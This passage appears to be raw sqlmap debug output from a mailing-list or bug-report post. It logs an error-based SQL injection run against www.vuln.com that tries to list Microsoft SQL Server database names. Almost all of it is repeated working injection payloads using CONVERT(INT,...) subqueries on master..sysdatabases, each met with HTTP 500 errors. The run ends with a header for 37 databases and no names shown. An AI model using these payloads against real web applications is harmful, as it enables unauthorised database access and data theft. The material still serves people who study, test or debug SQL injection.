6353=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 7 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'yXeO'='yXeO
[09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:49] [PAYLOAD] 20111' AND
6404=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 8 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'meBT'='meBT
[09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:49] [PAYLOAD] 20111' AND
5366=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 9 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'VLNB'='VLNB
[09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:49] [PAYLOAD] 20111' AND
3216=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 10 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GzkG'='GzkG
[09:55:49] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:49] [PAYLOAD] 20111' AND
9590=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 11 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'TbNN'='TbNN
[09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:50] [PAYLOAD] 20111' AND
8955=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 12 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gFlv'='gFlv
[09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:50] [PAYLOAD] 20111' AND
5205=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 13 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'mJMn'='mJMn
[09:55:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:50] [PAYLOAD] 20111' AND
7416=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 14 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'lNwo'='lNwo
[09:55:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:51] [PAYLOAD] 20111' AND
2571=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 15 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GvrD'='GvrD
[09:55:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:52] [PAYLOAD] 20111' AND
3907=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 16 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'copc'='copc
[09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:53] [PAYLOAD] 20111' AND
2836=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 17 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'cbyQ'='cbyQ
[09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:53] [PAYLOAD] 20111' AND
2761=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 18 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'ajnb'='ajnb
[09:55:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:53] [PAYLOAD] 20111' AND
4326=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 19 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'iIBt'='iIBt
[09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:54] [PAYLOAD] 20111' AND
6793=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 20 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'NIeI'='NIeI
[09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:54] [PAYLOAD] 20111' AND
4300=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 21 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'gTCQ'='gTCQ
[09:55:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:54] [PAYLOAD] 20111' AND
9109=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 22 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'fkxe'='fkxe
[09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:55] [PAYLOAD] 20111' AND
4177=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 23 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'GsiT'='GsiT
[09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:55] [PAYLOAD] 20111' AND
4909=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 24 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'OSmP'='OSmP
[09:55:55] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:55] [PAYLOAD] 20111' AND
5597=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 25 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'pmtB'='pmtB
[09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:56] [PAYLOAD] 20111' AND
445=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP
1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases
WHERE name NOT IN (SELECT TOP 26 name FROM master..sysdatabases ORDER BY 1
ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)))
AND 'COwJ'='COwJ
[09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:56] [PAYLOAD] 20111' AND
5653=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 27 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kLbk'='kLbk
[09:55:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:57] [PAYLOAD] 20111' AND
67=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP
1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases
WHERE name NOT IN (SELECT TOP 28 name FROM master..sysdatabases ORDER BY 1
ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)))
AND 'STKX'='STKX
[09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:57] [PAYLOAD] 20111' AND
4438=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 29 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'aijp'='aijp
[09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:57] [PAYLOAD] 20111' AND
8472=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 30 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'MmKf'='MmKf
[09:55:57] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:57] [PAYLOAD] 20111' AND
7560=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 31 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'uqfx'='uqfx
[09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:58] [PAYLOAD] 20111' AND
3694=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 32 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Okbd'='Okbd
[09:55:58] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:55:58] [PAYLOAD] 20111' AND
6264=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 33 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'kCDT'='kCDT
[09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:56:00] [PAYLOAD] 20111' AND
9947=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 34 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'Hspk'='Hspk
[09:56:00] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:56:00] [PAYLOAD] 20111' AND
4734=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT
TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM
master..sysdatabases WHERE name NOT IN (SELECT TOP 35 name FROM
master..sysdatabases ORDER BY 1 ORDER BY name) ORDER BY
1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58))) AND 'BNER'='BNER
[09:56:01] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:56:01] [PAYLOAD] 20111' AND
703=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(117)+CHAR(114)+CHAR(58)+(SELECT TOP
1 ISNULL(CAST(name AS NVARCHAR(4000)), CHAR(32)) FROM master..sysdatabases
WHERE name NOT IN (SELECT TOP 36 name FROM master..sysdatabases ORDER BY 1
ORDER BY name) ORDER BY 1)+CHAR(58)+CHAR(107)+CHAR(115)+CHAR(109)+CHAR(58)))
AND 'MPbC'='MPbC
[09:56:02] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[09:56:02] [DEBUG] performed 38 queries in 16 seconds
available databases [37]:

[09:56:02] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 62 times
[09:56:02] [INFO] Fetched data logged to text files under
'/path/sqlmap-dev/output/www.vuln.com'

[*] shutting down at: 09:56:02

David